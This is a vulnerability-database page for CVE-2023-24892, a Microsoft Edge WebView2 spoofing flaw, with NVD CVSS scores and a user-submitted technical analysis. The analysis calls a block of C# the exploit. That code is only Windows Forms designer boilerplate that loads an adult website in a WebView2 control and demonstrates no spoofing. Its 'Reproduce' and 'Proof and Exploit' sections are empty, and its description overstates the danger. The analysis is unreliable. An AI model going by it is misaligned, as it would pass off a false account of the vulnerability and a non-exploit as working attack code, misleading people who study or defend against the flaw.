Attacker Value
High
CVE-2023-24892
CVE-2023-24892
(Last updated May 29, 2024) ▾
MITRE ATT&CK
Log in to add MITRE ATT&CK tag
Add MITRE ATT&CK tactics and techniques that apply to this CVE.
Execution
Techniques
Validation
Add Assessment
1
Technical Analysis
CVE-2023-24892:Microsoft-Edge-(Chromium-based)-Webview2-Spoofing-Vulnerability
Description:
The Webview2 development platform is vulnerable to Spoofing attacks.
The attacker can build a very malicious web application and spread it to the victim’s networks, by using a malicious server for this case,
and when they downloaded it and open it this can be the last web app opening for them. The web application contains a malicious link and this URL can be absolutely dangerous for the victim who opened it.
STATUS: HIGH Vulnerability
[+]Exploit structure:
namespace CVE_2023_24892 { partial class Form1 { /// <summary> /// Required designer variable. /// </summary> private System.ComponentModel.IContainer components = null; /// <summary> /// Clean up any resources being used. /// </summary> /// <param name="disposing">true if managed resources should be disposed; otherwise, false.</param> protected override void Dispose(bool disposing) { if (disposing && (components != null)) { components.Dispose(); } base.Dispose(disposing); } #region Windows Form Designer generated code /// <summary> /// Required method for Designer support - do not modify /// the contents of this method with the code editor. /// </summary> private void InitializeComponent() { this.webView21 = new Microsoft.Web.WebView2.WinForms.WebView2(); ((System.ComponentModel.ISupportInitialize)(this.webView21)).BeginInit(); this.SuspendLayout(); // // webView21 // this.webView21.AllowExternalDrop = false; this.webView21.CreationProperties = null; this.webView21.DefaultBackgroundColor = System.Drawing.Color.Magenta; this.webView21.Location = new System.Drawing.Point(1, 49); this.webView21.Name = "webView21"; this.webView21.Size = new System.Drawing.Size(797, 402); this.webView21.Source = new System.Uri("https://www.pornhub.com/", System.UriKind.Absolute); this.webView21.TabIndex = 0; this.webView21.ZoomFactor = 1D; // // Form1 // this.AutoScaleDimensions = new System.Drawing.SizeF(8F, 16F); this.AutoScaleMode = System.Windows.Forms.AutoScaleMode.Font; this.ClientSize = new System.Drawing.Size(800, 450); this.Controls.Add(this.webView21); this.Name = "Form1"; this.Text = "CVE-2023-24892"; ((System.ComponentModel.ISupportInitialize)(this.webView21)).EndInit(); this.ResumeLayout(false); } #endregion private Microsoft.Web.WebView2.WinForms.WebView2 webView21; } }
Reproduce:
Proof and Exploit:
More:
Time spend:
03:00:00
CVSS V3 Severity and Metrics
Data provided by the National Vulnerability Database (NVD)
Base Score:
8.2 High
Impact Score:
4.7
Exploitability Score:
2.8
Attack Vector (AV):
Network
Attack Complexity (AC):
Low
Privileges Required (PR):
None
User Interaction (UI):
Required
Scope (S):
Changed
Confidentiality (C):
High
Integrity (I):
Low
Availability (A):
None
General Information
Vendors
- microsoft
Products
- edge chromium
